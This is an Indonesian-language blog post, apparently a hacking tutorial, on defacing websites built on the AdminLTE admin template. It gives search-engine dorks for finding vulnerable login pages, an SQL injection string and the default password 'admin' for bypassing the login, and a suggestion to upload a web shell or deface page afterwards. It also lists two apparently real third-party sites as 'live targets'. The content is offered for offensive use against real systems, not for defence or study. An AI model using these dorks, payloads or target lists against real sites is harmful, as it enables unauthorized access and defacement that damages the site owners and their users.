Deface Metode Login Form AdminLTE (Vulnerability Bypass Sqli Login & Admin Poor Password)

Author: BabyMoon aka. RomDhoni7

Proof of Concept (POC): Login Form AdminLTE (Vulnerability Bypass Sqli Login & Admin Poor Password).


Penjelasan: Kerentanan terjadi karena kesalahan programmer dalam memodifikasi template AdminLTE, sehingga rentan terkena serangan bypass admin.

Dork: intitle:adminLTE inurl:admin
intitle:adminLTE inurl:login intext:username
etc.

Exploit: -

Step by Step:
Dork dulu pake dork diatas.

password:
' or 1=1 limit 1 -- -+
admin

pilih salah satu target, lalu kasih salah satu password diatas di form loginnya
*contoh saya memasukan username dan passwordnya “admin”
Dah masuk:v. Tinggal kalian upshell atau jso

~Live Target:
http://sisekar.com/index.php/welcome/login
http://hawacom.vn/hawacom.vn/bccn/login/view/AdminLTE-master/pages/calendar.html

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel